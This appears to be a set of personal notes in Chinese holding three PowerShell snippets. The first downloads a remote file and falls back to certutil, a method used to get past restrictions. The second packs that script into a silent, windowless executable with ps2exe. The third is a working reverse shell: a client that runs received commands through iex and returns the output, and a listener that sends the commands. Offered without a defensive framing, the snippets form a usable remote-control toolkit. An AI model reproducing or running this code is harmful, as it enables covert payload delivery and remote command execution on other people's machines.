从远程下载文件并打开
# Define download URL and local save path
$downloadUrl = "https://example.com/xx-static-file/bin/test.txt"
$savePath = "C:\temp\test.txt"
# Ensure the save directory exists
$directory = Split-Path -Path $savePath -Parent
if (-not (Test-Path -Path $directory)) {
try {
New-Item -ItemType Directory -Path $directory -Force | Out-Null
Write-Host "Directory created: $directory" -ForegroundColor Green
} catch {
Write-Host "Failed to create directory: $_" -ForegroundColor Red
exit 1
}
}
# Method 1: Use Invoke-WebRequest (recommended)
try {
Write-Host "Downloading file..." -ForegroundColor Cyan
Invoke-WebRequest -Uri $downloadUrl -OutFile $savePath -ErrorAction Stop
Write-Host "File downloaded successfully: $savePath" -ForegroundColor Green
} catch {
Write-Host "Download failed, trying alternate method..." -ForegroundColor Yellow
# Method 2: Use certutil (for restricted environments)
try {
$certUtilOutput = certutil -urlcache -split -f $downloadUrl $savePath 2>&1
if ($LASTEXITCODE -ne 0) {
throw "certutil failed: $certUtilOutput"
}
Write-Host "File downloaded successfully: $savePath" -ForegroundColor Green
} catch {
Write-Host "Download failed: $_" -ForegroundColor Red
exit 1
}
}
# Verify file exists
if (Test-Path -Path $savePath) {
# Get file size in MB
$fileSize = [math]::Round((Get-Item $savePath).Length / 1MB, 2)
Write-Host "File size: $fileSize MB" -ForegroundColor Cyan
# Open file with Notepad
try {
Write-Host "Opening file with Notepad..." -ForegroundColor Cyan
Start-Process -FilePath "notepad.exe" -ArgumentList $savePath -ErrorAction Stop
} catch {
Write-Host "Failed to open file: $_" -ForegroundColor Red
Write-Host "File path: $savePath" -ForegroundColor Yellow
}
} else {
Write-Host "File does not exist. Download may have failed." -ForegroundColor Red
}
ps2exe 将脚本打包成exe程序
# 如果没安装就先执行 Install-Module -Name ps2exe -Scope CurrentUser
$scriptPath = "C:\Users\lenovo\Desktop\download_and_open_file.ps1"
$outputPath = "C:\Users\lenovo\Desktop\compiled.exe"
ps2exe $scriptPath $outputPath -NoConsole -NoOutput -STA
TCP通讯执行&反馈CMD命令结果
sender.ps1
# 简单反向 shell(文本模式)
$client = New-Object System.Net.Sockets.TCPClient("127.0.0.1", 8086);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + "PS " + (pwd).Path + "> ";
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush();
}
$client.Close();
receiver.ps1
# 监听 4444 端口,接收连接并交互
$listener = New-Object System.Net.Sockets.TcpListener("127.0.0.1", 8086);
$listener.Start();
$client = $listener.AcceptTcpClient();
$stream = $client.GetStream();
$reader = New-Object System.IO.StreamReader($stream);
$writer = New-Object System.IO.StreamWriter($stream);
$writer.AutoFlush = $true;
# 交互循环:输入命令并发送给目标
while($true) {
$command = Read-Host "Enter command"; # 输入要发送的命令(如 dir、ipconfig)
$writer.WriteLine($command); # 发送命令到目标机器
$response = $reader.ReadToEnd(); # 读取目标的返回结果
Write-Host $response; # 显示结果
}
# 结束时关闭连接(可选)
$stream.Close();
$client.Close();
$listener.Stop();
